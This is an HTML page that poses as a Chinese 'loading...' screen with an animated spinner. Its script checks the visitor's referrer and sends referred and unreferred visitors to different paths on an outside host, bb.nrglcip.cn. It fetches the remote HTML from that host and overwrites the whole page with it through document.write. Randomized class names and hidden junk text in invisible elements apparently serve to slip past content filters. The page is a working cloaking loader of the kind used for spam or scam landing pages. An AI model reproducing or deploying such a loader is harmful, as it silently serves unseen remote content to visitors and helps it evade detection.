<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PyVH95 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PyVH95 .UHQ0adZPad {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PyVH95 .content {
            line-height: 50px;
            text-align: center
        }

        .PyVH95 .img {
            width: 100%
        }

        .PyVH95 .kPofJSZgGZ {
            text-align: center
        }

        .PyVH95 .kPofJSZgGZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PyVH95 .kPofJSZgGZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PyVH95 .kPofJSZgGZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PyVH95 .kPofJSZgGZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PyVH95 .kPofJSZgGZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PyVH95 .kPofJSZgGZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PyVH95 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bIuuc6KWR6Y6G(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DeJPo = bIuuc6KWR6Y6G('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DeJPo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DeJPo +".html?a=share";
		}
		
        ilOXckrG=url+"#"+new Date().getTime();
        ilOXckrG && function() {
            $.get(ilOXckrG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>IMijEnMyY6WCM</p>
<span style='display:none'>sb1IZWk9seqwMgby</span>
<div style='display:none'>zOfAJETQ71YVWpUB2X96AhR24Lxb2dvuuDnY24ziGYfXcHpiM</div>
<ul style='display:none' >g5Wey6cHtdU17jnXwol6wHGirlLalUPMJjfhfK9TAwFG7KaB</ul>
<p  style='display:none'>IMijEnMyY6WCM</p>
<a  href='#' style='display:none'>DK5sOwPCCdGZuvJF</a>
<div style='display:none'>zOfAJETQ71YVWpUB2X96AhR24Lxb2dvuuDnY24ziGYfXcHpiM</div>
<span style='display:none'>sb1IZWk9seqwMgby</span><div class="PyVH95">
    <div class="UHQ0adZPad">
        <div class="kPofJSZgGZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>wD1TGOKfco0enjCtujCNXnzJ</p>
<img  src='' style='display:none'></body>
</html>